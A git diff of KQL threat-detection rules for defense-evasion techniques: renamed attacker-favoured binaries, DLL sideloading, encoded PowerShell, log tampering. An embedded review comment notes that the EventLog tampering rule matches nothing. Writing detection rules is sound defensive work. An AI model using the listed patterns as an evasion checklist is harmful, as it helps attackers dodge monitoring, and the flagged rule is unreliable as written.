ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or 
ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine 
contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql index 969840b0..cf1fc9dd 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql 
@@ -1,12 +1,12 @@ -// Title: Potential Defense Evasion Via Binary Rename -// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019-06-15 -// Level: medium -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Binary Rename +// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) +// Date: 2019-06-15 +// Level: medium +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql index 6f6fd84c..0505dd7f 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql 
@@ -1,13 +1,13 @@ -// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries -// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 -// Date: 2019-06-15 -// Level: high -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009 -// False Positives: -// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist -// - PsExec installed via Windows Store doesn't contain original filename field (False negative) - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 +// Date: 2019-06-15 +// Level: high +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist +// - PsExec installed via Windows Store doesn't contain original filename field (False negative) + +DeviceProcessEvents | where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql index 594222d1..36d5fd90 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql 
@@ -1,13 +1,13 @@ -// Title: Potential Defense Evasion Via Right-to-Left Override -// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2023-02-15 -// Level: high -// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. -// This is used as an obfuscation and masquerading techniques. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.002 -// False Positives: -// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Right-to-Left Override +// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. +// This is used as an obfuscation and masquerading techniques. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.002 +// False Positives: +// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character + +DeviceProcessEvents | where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql index aa3c0853..aeecc73e 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DBGCORE.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-10-25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DBGCORE.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects DLL sideloading of "dbgcore.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql index 6f57d451..ba5d5ce4 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql 
+++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DBGHELP.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-10-25 -// Level: medium -// Description: Detects potential DLL sideloading of "dbghelp.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DBGHELP.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects potential DLL sideloading of "dbghelp.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll")))) \ 
No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql index 24a6fe3e..e17f83f8 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql index 075a86e3..44d43c37 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql 
@@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Via ClassicExplorer32.dll -// Author: frack113 -// Date: 2022-12-13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via ClassicExplorer32.dll +// Author: frack113 +// Date: 2022-12-13 +// Level: medium +// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql index fa0f3ac5..a6545a1b 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Via comctl32.dll -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022-12-16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via comctl32.dll +// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) +// Date: 2022-12-16 +// Level: high +// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql index 29802420..da26d015 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql 
@@ -1,10 +1,10 @@
-// Title: Potential DLL Sideloading Via JsSchHlp
-// Author: frack113
-// Date: 2022-12-14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential DLL Sideloading Via JsSchHlp
+// Author: frack113
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql
index da146b02..f4b66630 100644
--- a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql
+++ b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql
@@ -1,10 +1,10 @@
-// Title: Potential Encoded PowerShell Patterns In CommandLine
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020-10-11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Potential Encoded PowerShell Patterns In CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: low
+// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
index 737412a3..451f6f29 100644
--- a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
+++ b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql
@@ -1,10 +1,10 @@
-// Title: Potential EventLog File Location Tampering
-// Author: D3F7A5105
-// Date: 2023-01-02
-// Level: high
-// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002
-
-DeviceRegistryEvents
+// Title: Potential EventLog File Location Tampering
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: high
+// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
index dba28315..540371d3 100644
--- a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
+++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
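Review bot: The context line `| where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File")` can never be true: KQL `endswith` is a literal string comparison, so the `*` is not a wildcard, and a key cannot end with both `EventLog*` and `\File` at once. The rule therefore matches nothing, which for a log-tampering detection is worse than a noisy one because the gap is silent. The hunk itself only re-emits the header lines unchanged (line-ending churn), so the fix belongs in the converter or the source rule, e.g. `| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\" and RegistryKey endswith "\\File" and not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")`. The `endswith "…*"` shape looks like a wildcard the backend left unexpanded, so other generated rules in this commit may carry the same defect and are worth grepping for.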
@@ -1,12 +1,12 @@
-// Title: Potential Fake Instance Of Hxtsr.EXE Executed
-// Author: Sreeman
-// Date: 2020-04-17
-// Level: medium
-// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
-// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
-// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Potential Fake Instance Of Hxtsr.EXE Executed
+// Author: Sreeman
+// Date: 2020-04-17
+// Level: medium
+// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
+// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
+// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
